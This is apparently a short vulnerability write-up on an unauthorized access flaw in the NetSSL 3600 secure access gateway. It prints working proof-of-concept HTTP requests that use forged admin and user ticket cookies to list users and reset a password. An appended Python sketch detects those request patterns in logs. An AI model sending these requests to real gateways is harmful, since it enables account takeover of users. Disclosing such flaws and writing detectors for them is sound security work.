Netssl 3600 Secure Access Gateway System Unauthorized Access Vulnerability
# Net God SecSSL 3600 Secure Access Gateway System Unauthorized Access Vulnerability
Vulnerability Description
The NetSSL 3600 secure access gateway system has an unauthorized access vulnerability. An attacker can use it to obtain the user list and modify user account passwords.
Vulnerability Impact
Net God SecSSL 3600 Secure Access Gateway System
Network surveying and mapping
Vulnerability reproduction
Login page
Verify the PoC and get the user list
GET /admin/group/x_group.php?id=2
Cookie: admin_id=1; gw_admin_ticket=1;
Modify user password
POST /changepass.php?type=2
Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"ceshi","subAuthId":"1"}
old_pass=&password=Asd123!@#123A&repassword=Asd123!@#123A
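Detection sketch for the two requests above, added here as an example and not part of the original post: it flags admin pages requested with a placeholder `gw_admin_ticket`, and `/changepass.php` posts that carry a placeholder `gw_user_ticket` or an empty `old_pass`. The request-record layout, the `/admin/` prefix generalization, the ticket heuristic and the sample records are assumptions; the page does not document the real ticket format.

```python
from urllib.parse import urlsplit, parse_qs

def parse_cookies(header):
    """Split a Cookie header on ';' only, so a JSON value with ',' and ':' survives."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies

def placeholder_ticket(value):
    # Assumption: a genuine ticket is a long random value, so a very short
    # value or one repeated character is treated as a placeholder.
    return value is not None and (len(value) < 16 or len(set(value)) == 1)

def findings(req):
    """Return the reasons a logged request matches the patterns on this page."""
    url = urlsplit(req["target"])
    cookies = parse_cookies(req.get("cookie", ""))
    hits = []
    if url.path.startswith("/admin/") and placeholder_ticket(cookies.get("gw_admin_ticket")):
        hits.append("admin page requested with placeholder gw_admin_ticket")
    if req["method"] == "POST" and url.path == "/changepass.php":
        form = parse_qs(req.get("body", ""), keep_blank_values=True)
        if placeholder_ticket(cookies.get("gw_user_ticket")):
            hits.append("password change with placeholder gw_user_ticket")
        if form.get("old_pass") == [""] and form.get("password", [""])[0]:
            hits.append("password change with empty old_pass")
    return hits

# Constructed sample records, shaped like the output of a reverse proxy or WAF
# that logs the request line, Cookie header and form body.
REAL = "9c1e4b7a02d35f68a1b0c4d7e8f90123"  # constructed random-looking ticket
SAMPLES = [
    {"method": "GET", "target": "/admin/group/x_group.php?id=2",
     "cookie": "admin_id=1; gw_admin_ticket=1;"},
    {"method": "POST", "target": "/changepass.php?type=2",
     "cookie": 'admin_id=1; gw_user_ticket=' + "f" * 32
               + '; last_step_param={"this_name":"user1","subAuthId":"1"}',
     "body": "old_pass=&password=EXAMPLE&repassword=EXAMPLE"},
    {"method": "GET", "target": "/admin/group/x_group.php?id=2",
     "cookie": "admin_id=1; gw_admin_ticket=" + REAL},
    {"method": "POST", "target": "/changepass.php?type=2",
     "cookie": "gw_user_ticket=" + REAL,
     "body": "old_pass=OLD&password=EXAMPLE&repassword=EXAMPLE"},
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample["method"], sample["target"], findings(sample))
```
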
This post is licensed under CC BY 4.0 by the author.